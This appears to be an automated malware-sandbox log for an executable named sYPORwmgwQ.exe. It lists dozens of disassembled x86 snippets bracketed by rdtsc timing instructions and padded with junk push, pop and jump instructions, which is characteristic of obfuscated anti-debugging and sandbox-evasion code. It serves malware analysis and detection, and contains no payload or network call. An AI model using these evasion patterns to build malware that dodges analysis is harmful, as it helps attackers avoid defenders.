Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 109E67E second address: 109E6B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED527555h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1DED527556h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 109E6B0 second address: 109E6BA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1DECBA0FDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10A0314 second address: 10A031E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10A1381 second address: 10A138A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10A138A second address: 10A13EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b movsx ebx, di 0x0000000e movsx edi, ax 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 jmp 00007F1DED52754Bh 0x00000019 pop ebx 0x0000001a jmp 00007F1DED52754Ch 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push eax 0x00000024 call 00007F1DED527548h 0x00000029 pop eax 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e add dword ptr [esp+04h], 0000001Dh 0x00000036 inc eax 0x00000037 push eax 0x00000038 ret 0x00000039 pop eax 0x0000003a ret 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push esi 0x0000003f jmp 00007F1DED52754Dh 0x00000044 pop esi 0x00000045 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10A13EF second address: 10A13F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10A062C second address: 10A0636 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1DED527546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10A5B88 second address: 10A5B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F1DECBA0FD6h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10A5B97 second address: 10A5BCC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1DED527546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007F1DED527561h 0x00000010 jng 00007F1DED52754Eh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10A5BCC second address: 10A5BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 jl 00007F1DECBA0FD6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10A24EC second address: 10A2558 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F1DED52754Bh 0x0000000c nop 0x0000000d mov ebx, dword ptr [ebp+122D333Fh] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov ebx, 355C4930h 0x0000001f add dword ptr [ebp+122D1A56h], edi 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007F1DED527548h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 00000015h 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 mov edi, dword ptr [ebp+122D33D2h] 0x0000004c mov eax, dword ptr [ebp+122D0081h] 0x00000052 movzx ebx, ax 0x00000055 push FFFFFFFFh 0x00000057 pushad 0x00000058 stc 0x00000059 movzx edi, cx 0x0000005c popad 0x0000005d nop 0x0000005e push edi 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10A5BDC second address: 10A5BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10A2558 second address: 10A255C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10A5BE1 second address: 10A5BE6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10A255C second address: 10A2560 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10A5BE6 second address: 10A5C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1DECBA0FDDh 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F1DECBA0FD6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10A675C second address: 10A6760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10AC1E5 second address: 10AC1EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10AC1EB second address: 10AC1FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1DED52754Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10AC1FC second address: 10AC22C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F1DECBA0FD6h 0x00000009 jmp 00007F1DECBA0FDFh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 ja 00007F1DECBA0FD6h 0x00000019 push esi 0x0000001a pop esi 0x0000001b jbe 00007F1DECBA0FD6h 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10AC22C second address: 10AC232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10AC232 second address: 10AC244 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1DECBA0FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F1DECBA0FDEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10AB92C second address: 10AB930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10AB930 second address: 10AB941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 jng 00007F1DECBA100Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10AB941 second address: 10AB964 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1DED527557h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10AB964 second address: 10AB968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10ABD2E second address: 10ABD3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F1DED527546h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10ABD3A second address: 10ABD3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10B1234 second address: 10B1238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10B6466 second address: 10B6474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1DECBA0FDAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10B6474 second address: 10B6497 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1DED527546h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F1DED527553h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10B6A1E second address: 10B6A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1DECBA0FDBh 0x0000000a popad 0x0000000b push ebx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10B6D48 second address: 10B6D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10B6D4E second address: 10B6D68 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F1DECBA0FE0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10B6D68 second address: 10B6D6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10B6D6C second address: 10B6D70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10B6EF0 second address: 10B6EF6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10B6EF6 second address: 10B6F1A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1DECBA0FDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1DECBA0FE4h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10B6F1A second address: 10B6F24 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1DED527546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10BB44B second address: 10BB46A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F1DECBA0FE2h 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10BB46A second address: 10BB484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F1DED527546h 0x0000000a pop eax 0x0000000b popad 0x0000000c jc 00007F1DED52755Ah 0x00000012 je 00007F1DED52754Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1083879 second address: 106ABCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DECBA0FDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1DECBA0FE6h 0x0000000e popad 0x0000000f push eax 0x00000010 jno 00007F1DECBA0FE0h 0x00000016 nop 0x00000017 movsx ecx, bx 0x0000001a mov ecx, 083FBEB7h 0x0000001f lea eax, dword ptr [ebp+124755B1h] 0x00000025 jng 00007F1DECBA0FD9h 0x0000002b movsx edi, bx 0x0000002e nop 0x0000002f jmp 00007F1DECBA0FE2h 0x00000034 push eax 0x00000035 jnp 00007F1DECBA0FDCh 0x0000003b pushad 0x0000003c pushad 0x0000003d popad 0x0000003e pushad 0x0000003f popad 0x00000040 popad 0x00000041 nop 0x00000042 sub dword ptr [ebp+124742C9h], ecx 0x00000048 call dword ptr [ebp+122D19BEh] 0x0000004e jmp 00007F1DECBA0FDBh 0x00000053 pushad 0x00000054 pushad 0x00000055 jc 00007F1DECBA0FD6h 0x0000005b jmp 00007F1DECBA0FE0h 0x00000060 popad 0x00000061 jmp 00007F1DECBA0FE1h 0x00000066 push eax 0x00000067 push edx 0x00000068 jnl 00007F1DECBA0FD6h 0x0000006e jmp 00007F1DECBA0FE3h 0x00000073 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1083DC5 second address: 1083DEC instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1DED527546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F1DED527555h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1083E73 second address: 1083ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F1DECBA0FE9h 0x0000000b jmp 00007F1DECBA0FE2h 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 jmp 00007F1DECBA0FDBh 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c jmp 00007F1DECBA0FDDh 0x00000021 mov eax, dword ptr [eax] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F1DECBA0FDDh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1083ED6 second address: 1083EDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1083EDA second address: 1083EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1083EE0 second address: 1083EE5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1083EE5 second address: 1083EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1083F97 second address: 1083F9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1083F9D second address: 1083FAA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10841D8 second address: 10841DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10841DC second address: 10841E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10842F5 second address: 10842FF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1DED52754Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10848D1 second address: 10848D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1084A97 second address: 1084AC1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1DED527548h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F1DED527554h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1084AC1 second address: 1084AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1084AC6 second address: 1084B16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED527558h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F1DED527556h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 jmp 00007F1DED527554h 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1084B9E second address: 1084BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1084BA3 second address: 1084BC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F1DED52754Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F1DED52754Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1084BC5 second address: 1084BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1084BC9 second address: 1084BCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10BA5AB second address: 10BA5B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10BA5B1 second address: 10BA5BD instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1DED527546h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10BAE1E second address: 10BAE25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10BAE25 second address: 10BAE40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1DED527551h 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10BAE40 second address: 10BAE56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1DECBA0FE1h 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10BAE56 second address: 10BAE5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10BAE5D second address: 10BAE63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10BAE63 second address: 10BAE83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F1DED527546h 0x0000000f jmp 00007F1DED527551h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10BAE83 second address: 10BAE87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10C1E80 second address: 10C1E90 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1DED527546h 0x00000008 jl 00007F1DED527546h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10C6529 second address: 10C6531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10C6531 second address: 10C6537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10C6537 second address: 10C653C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10C681B second address: 10C681F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10C6AA1 second address: 10C6AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F1DECBA0FD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10C6AAB second address: 10C6AB1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10C7048 second address: 10C704C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10CC8EA second address: 10CC8EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10CC8EE second address: 10CC8FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10CC8FE second address: 10CC904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10CC904 second address: 10CC921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F1DECBA0FE4h 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10CC310 second address: 10CC318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10CC318 second address: 10CC31E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10CC31E second address: 10CC352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1DED52754Dh 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 jmp 00007F1DED52754Fh 0x00000015 jo 00007F1DED527546h 0x0000001b jnl 00007F1DED527546h 0x00000021 popad 0x00000022 rdtsc
